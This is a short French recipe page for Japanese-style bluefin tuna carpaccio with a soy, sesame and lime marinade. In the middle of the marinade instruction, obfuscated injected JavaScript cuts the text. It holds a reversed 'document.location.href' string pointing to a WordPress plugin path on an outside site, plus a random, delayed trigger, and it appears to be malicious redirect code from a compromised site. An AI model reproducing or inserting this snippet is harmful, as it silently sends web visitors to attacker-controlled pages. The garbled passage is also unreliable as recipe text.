
CARPACCIO DE THON ROUGE À LA JAPONAISE
Pour 4 Pers.
INGRÉDIENTS :
– 3 filets de thon rouge congelés
– 1 CS d’huile de sésame
– 2 gousses d’ail
– 1 CS de gingembre congelé ou frais
– 1 CS de ciboulette ciselée
– 3 CS de vinaigre balsamique
– 6 CS de sauce soja
– le jus d’un citron vert bien juteux
– 1 CS de graines de sésame noir
Ne pas décongeler complètement le poisson, il sera plus facile à découper !
À l’aide d’un couteau bien aiguisé, détailler les filets en fines lamelles et les disposer en rosace sur 4 grandes assiettes.
Réserver au frigo jusqu’au moment de servir.
Mélanger toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tous les ingrédients de la marinade et réserver au frais.
5 minutes avant de servir, déposer un peu de marinade sur les carpaccios, et décorer avec les graines de sésames.
NB : On peut servir ce carpaccio avec une salade de germes de soja.
Bon appétit !
